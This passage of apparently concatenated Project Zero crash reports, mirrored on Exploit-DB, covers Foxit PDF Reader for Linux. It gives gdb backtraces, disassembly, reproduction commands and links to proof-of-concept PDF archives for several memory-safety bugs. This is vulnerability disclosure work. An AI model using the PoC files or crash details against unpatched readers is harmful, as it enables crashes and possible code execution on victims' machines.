#46 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#47 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#48 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#49 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#50 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#51 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
--- cut ---
Attached are six proof of concept PDF files: three derived from an original file named 172.pdf in our original corpus, and three derived from 5659.pdf. While the two groups of files generate crashes with slightly different stack traces, the overall symptoms are similar enough to assume they expose the same bug in the code.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39940.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=745
We have identified the following crash due to an invalid read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
(gdb) where
#0 0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
#1 0x00000000006c53a8 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#2 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#3 0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
#4 0x00000000006c6364 in CRichTextXML::ParseXML2Text() ()
#5 0x00000000006c6a33 in CRichTextXML::SetXML(wchar_t const*, wchar_t const*) ()
#6 0x00000000006c9d49 in CFX_Edit::SetRichTextByXML(wchar_t const*, wchar_t const*, int, int) ()
#7 0x000000000067e995 in CPWL_Note_Contents::SetRichText(CFX_WideString const&) ()
#8 0x000000000067e9e5 in CPWL_NoteItem::SetRichContents(CFX_WideString const&) ()
#9 0x00000000005cbcc7 in CMarkup_Popup::SetNoteContents(CFX_WideString const&, CReader_PageView*) ()
#10 0x00000000005ca0e7 in CMarkup_Popup::InitNote(CReader_PageView*) ()
#11 0x00000000005ca420 in CMarkup_Popup::CreateNote(CReader_PageView*, int) ()
#12 0x00000000005cd578 in CMarkup_Popup::UpdateNote(CReader_PageView*, int) ()
#13 0x00000000005d2475 in CMarkup_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
#14 0x00000000006e733e in CTA_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
#15 0x0000000000640424 in CBA_PageEventHandler::OnPageVisible(CReader_PageView*) ()
#16 0x0000000000461d1b in CReader_AppEx::OnPageVisible (this=0x14a5120, pDocView=0x19446a0)
at ../../Readerlite/ReaderLite/src/frd_appex.cpp:2901
#17 0x0000000000450bec in CReader_ViewPage::DoPageVisibleAction (this=0x1944670)
at ../../Readerlite/ReaderLite/src/preview.cpp:3204
x#18 0x000000000044b980 in CPDF_TVPreview::Slot_DoPageVisibleEvent (this=0x1943180)
at ../../Readerlite/ReaderLite/src/preview.cpp:1443
#19 0x000000000044e333 in CPDFViewerEventHandler::OnFinishRender (this=0x194c520)
at ../../Readerlite/ReaderLite/src/preview.cpp:2386
#20 0x000000000061db28 in CPDFViewerEx::ContinueRendering() ()
#21 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#22 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1943180)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#23 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#27 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#45 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#46 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#47 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#48 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#49 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#50 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#51 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#52 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#53 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#54 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#55 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#56 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#57 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#58 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#59 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0xab467f <_ZN14CFX_WideStringaSERKS_+51>: cmpq $0x0,0x0(%r13)
0xab4684 <_ZN14CFX_WideStringaSERKS_+56>: js 0xab4692 <_ZN14CFX_WideStringaSERKS_+70>
0xab4686 <_ZN14CFX_WideStringaSERKS_+58>: test %rbp,%rbp
0xab4689 <_ZN14CFX_WideStringaSERKS_+61>: je 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
0xab468b <_ZN14CFX_WideStringaSERKS_+63>: cmpq $0x0,0x0(%rbp)
0xab4690 <_ZN14CFX_WideStringaSERKS_+68>: jns 0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
0xab4692 <_ZN14CFX_WideStringaSERKS_+70>: mov 0x8(%rbp),%esi
0xab4695 <_ZN14CFX_WideStringaSERKS_+73>: lea 0x10(%rbp),%rdx
0xab4699 <_ZN14CFX_WideStringaSERKS_+77>: mov %rbx,%rdi
0xab469c <_ZN14CFX_WideStringaSERKS_+80>: callq 0xab45a8 <_ZN14CFX_WideString10AssignCopyEiPKw>
(gdb) info reg $r13
r13 0x740000006e 498216206446
--- cut ---
Attached is a proof of concept PDF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39942.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=744
We have identified the following crash due to an out-of-bounds read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const ()
(gdb) where
#0 0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const
()
#1 0x00000000007fbd6c in CPDF_DIBSource::GetScanline(int) const ()
#2 0x000000000084b849 in CFX_DIBSource::Clone(FX_RECT const*) const ()
#3 0x00000000007f2e71 in CPDF_ImageCache::ContinueGetCachedBitmap() ()
#4 0x00000000007f2f9e in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#5 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#6 0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#7 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#8 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
#9 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
#10 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
#11 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
#12 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
#13 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
#14 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#15 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#16 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#17 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#18 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191fca0)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#19 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#20 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#21 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#23 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
---Type <return> to continue, or q <return> to quit---
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#45 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#46 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#47 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#48 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#49 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#50 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#51 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#52 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#53 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#54 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#55 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0x7fb462 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+188>: mov 0x2(%rbp),%dl
0x7fb465 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+191>: add $0x3,%r13
0x7fb469 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+195>: add $0x3,%rbp
0x7fb46d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+199>: inc %eax
0x7fb46f <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+201>: mov %dl,-0x3(%r13)
0x7fb473 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+205>: mov -0x2(%rbp),%dl
0x7fb476 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+208>: mov %dl,-0x2(%r13)
0x7fb47a <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+212>: mov -0x3(%rbp),%dl
0x7fb47d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+215>: mov %dl,-0x1(%r13)
0x7fb481 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+219>:
jmp 0x7fb459 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+179>
(gdb) info reg $rbp
rbp 0x1a30fff 0x1a30fff
--- cut ---
Attached is a proof of concept PDF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39941.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=743
We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
(gdb) info reg $rdx
rdx 0x90ff9fc23e15101d -7998498756572671971
(gdb) where
#0 0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
#1 0x0000000000922297 in kdu_supp::kdu_region_decompressor::start(kdu_core::kdu_codestream, kdu_supp::kdu_channel_mapping*, int, int, int, kdu_core::kdu_dims, kdu_core::kdu_coords, kdu_core::kdu_coords, bool, kdu_core::kdu_component_access_mode, bool, kdu_core::kdu_thread_env*, kdu_core::kdu_thread_queue*) ()
#2 0x00000000008bd50d in CJPX_Decoder::Start(unsigned char*, int, int, unsigned char*) ()
#3 0x00000000007f8d77 in CPDF_DIBSource::StartLoadJpxBitmap() ()
#4 0x00000000007f9137 in CPDF_DIBSource::CreateDecoder() ()
#5 0x00000000007fadb0 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) ()
#6 0x00000000007f2f74 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#7 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#8 0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#9 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#10 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
#11 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
#12 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
#13 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
#14 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
#15 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
#16 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#17 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#18 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#19 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#20 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1946d30)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#21 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#23 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#25 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
